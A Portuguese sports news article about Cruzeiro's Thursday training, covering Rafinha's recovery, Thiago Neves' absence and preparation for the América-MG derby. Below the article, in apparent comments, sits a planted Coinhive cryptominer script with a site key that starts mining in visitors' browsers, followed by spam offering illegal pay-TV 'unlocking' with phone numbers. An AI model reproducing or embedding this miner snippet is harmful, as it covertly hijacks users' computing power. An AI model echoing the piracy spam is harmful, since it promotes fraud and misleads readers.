Rafinha em campo: depois do susto na 4ª feira, ele participa do treino desta 5ª (Foto: Thaynara Amaral)
Foi apenas um susto. Após deixar o campo de carrinho-maca na quarta-feira, Rafinha mostrou estar recuperado da pancada que levou na perna direita. Artilheiro do Campeonato Mineiro, com quatro gols, ele treinou normalmente na manhã desta quinta. Com isso, é possível que esteja entre os titulares no clássico com o América-MG, no domingo, às 17h (de Brasília), no Mineirão, pela quinta rodada.
Quem ainda não tem presença confirmada é Thiago Neves. Poupado dos últimos dois treinos, o meia não participou de toda a atividade nesta quinta. Ele foi a campo, fez o aquecimento com o grupo e voltou para as dependências internas da Toca da Raposa. De acordo com o clube, isso já estava programado.
O lateral-direito Edilson, que não treinou na quarta, participou normalmente dos trabalhos. Assim como Fred, que se recuperou da indisposição estomacal. Os desfalques ficaram por conta do lateral-direito Ezequiel e do zagueiro Manoel, ambos poupados.
O clássico com o América-MG está próximo, e o técnico Mano Menezes ainda não deu nenhuma pista de qual equipe vai escalar. Nesta quinta, ele comandou uma atividade em campo reduzido, com sete jogadores em cada equipe. O objetivo era trocar passes rápidos, em busca do gol. Outros sete atletas ficavam do lado de fora como “curingas” e ajudavam os dois times.
E o time titular?
Fica a expectativa para que nesta sexta-feira, Mano esboce um possível time titular para o jogo de domingo. O treino será no período da tarde. Diante do América-MG, o Cruzeiro defenderá a liderança do Campeonato Mineiro. O clube celeste tem a mesma pontuação do Coelho (10 pontos), porém, fica à frente devido ao saldo de gols.
(Comentário excluído)
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça
liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776